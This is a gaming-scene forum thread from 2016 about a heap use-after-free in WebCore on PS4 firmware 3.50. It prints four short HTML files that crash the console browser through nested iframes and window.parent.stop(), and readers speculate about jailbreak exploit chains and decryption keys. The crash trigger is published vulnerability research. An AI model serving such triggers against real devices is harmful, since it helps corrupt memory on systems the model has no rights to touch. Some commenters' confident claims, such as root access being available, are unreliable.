Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 Jailbreaking       Thread starter PSXHAX       Start date May 21, 2016 at 3:38 PM       49      
Status
Not open for further replies.
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.

Anywho make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
       document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause a out of memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
PS4 Heap Use-After-Free At WebCore 3.50 PoC.jpg
 

Comments

this method is easy as I said earlier the gap is there. while not one.
 
So, today... what kind of code could be injected, what kind of homebrews could be created based on this findings ???

I dont know the ps4 system, so please, someone could explain it, ? please.
Thanks.
 
i think it is in this direction ->

Find a Vuin -> If found like the Memory error -> Check if the Vuln is exploitable -> If so its a good sign -> Next step use a exploit to the vuln for an entry point -> entry point ok -> exploit for userland is needed -> if found -> use exploit for userland to gain kernel access -> now we have Kernel access but another exploit is needed for gain root or run own code....

Just my thinking it can be wrong maybe a dev (Mr Toolchain and Mrs Kernel aka @Chaos Kid aka CFWProphet ^^) could explain if this is ok....^^
This vulnerability is good it does work with a few different ways I have tested so far. No need for code injection and if you stay close with original compiler you can literally crash the system and see the heap on memory and where the loc pointer shod be directed.
Keep in mind I'm not just known for toolchains nor kernels I dig out the info for whats usable and how it can work to come together.
Some information
This is very close to ode rigid body moving objects simulation.
 
I´m new to here.
Just a simple question.

What the devs need for a jailbreak?
I mean, the entry point is there and you can get root privileges.

What does the devs need for a CFW like Rebug for example?
 
I´m new to here.
Just a simple question.

What the devs need for a jailbreak?
I mean, the entry point is there and you can get root privileges.

What does the devs need for a CFW like Rebug for example?

first of all they need keys !!! To decrypt the Firmware change the files and encrypt them again that the PS4 recognize the Firmware as a valid one....

Correct me if iam wrong....
 
Status
Not open for further replies.
Back
Top